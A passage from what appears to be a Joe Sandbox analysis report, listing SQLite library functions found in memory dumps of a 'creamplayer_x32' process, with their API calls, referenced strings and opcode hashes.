                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 571598680-0
                                                                                                    • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                    • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                                    • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                                    • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                                    APIs
                                                                                                    • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                      • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                                    • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                                    • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                    • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                    • sqlite3_free.SQLITE3 ref: 60963621
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 4276469440-0
                                                                                                    • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                    • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                                    • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                    • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                                    Strings
                                                                                                    • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                                    • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                                    • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                    • API String ID: 4080917175-264706735
                                                                                                    • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                    • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                                    • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                    • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                                    • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                                    • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: library routine called out of sequence$out of memory
                                                                                                    • API String ID: 2019783549-3029887290
                                                                                                    • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                    • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                                    • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                    • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                                    • sqlite3_free.SQLITE3 ref: 609406F7
                                                                                                    • sqlite3_free.SQLITE3 ref: 60940705
                                                                                                    • sqlite3_free.SQLITE3 ref: 60940713
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094071E
                                                                                                    • sqlite3_free.SQLITE3 ref: 60940729
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094073C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1159759059-0
                                                                                                    • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                                    • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                                                    • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                                    • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                                      • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                                    • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID: List of tree roots: $d$|
                                                                                                    • API String ID: 3709608969-1164703836
                                                                                                    • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                    • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                                    • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                    • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                                    APIs
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                                    • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                                    • String ID: e
                                                                                                    • API String ID: 786425071-4024072794
                                                                                                    • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                    • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                                    • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                    • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_exec
                                                                                                    • String ID: sqlite_master$sqlite_temp_master$|
                                                                                                    • API String ID: 2141490097-2247242311
                                                                                                    • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                    • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                                    • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                    • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3422960571-0
                                                                                                    • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                    • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                                    • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                    • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                                    APIs
                                                                                                      • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                                      • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                      • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                      • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                      • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID:
                                                                                                    • API String ID: 683514883-0
                                                                                                    • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                    • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                                    • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                    • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
APIs
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
• sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
• sqlite3_free.SQLITE3 ref: 6093A3BA
• sqlite3_free.SQLITE3 ref: 6093A3C2
  • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
  • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
  • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
• String ID:
• API String ID: 1903298374-0
• Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
• Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
• Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
• Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
APIs
  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
• sqlite3_mutex_enter.SQLITE3 ref: 6093A114
• sqlite3_mutex_free.SQLITE3 ref: 6093A152
• sqlite3_mutex_leave.SQLITE3 ref: 6093A162
• sqlite3_free.SQLITE3 ref: 6093A1A4
• sqlite3_free.SQLITE3 ref: 6093A1C3
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
• String ID:
• API String ID: 1894464702-0
• Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
• Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
• Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
• Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
APIs
  • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
• sqlite3_mutex_leave.SQLITE3 ref: 609253C4
• sqlite3_log.SQLITE3 ref: 609253E2
• sqlite3_log.SQLITE3 ref: 60925406
• sqlite3_mutex_leave.SQLITE3 ref: 60925443
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
• String ID:
• API String ID: 3336957480-0
• Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
• Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
• Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
• Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
APIs
• sqlite3_result_blob.SQLITE3 ref: 609613D0
• sqlite3_column_int.SQLITE3 ref: 6096143A
• sqlite3_data_count.SQLITE3 ref: 60961465
• sqlite3_column_value.SQLITE3 ref: 60961476
• sqlite3_result_value.SQLITE3 ref: 60961482
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
• String ID:
• API String ID: 3091402450-0
• Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
• Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
• Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
• Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
APIs
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
• String ID:
• API String ID: 251237202-0
• Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
• Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
• Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
• Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
APIs
• sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
• sqlite3_value_text.SQLITE3 ref: 6091A349
• sqlite3_value_bytes.SQLITE3 ref: 6091A356
• sqlite3_value_text.SQLITE3 ref: 6091A37B
• sqlite3_value_bytes.SQLITE3 ref: 6091A387
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
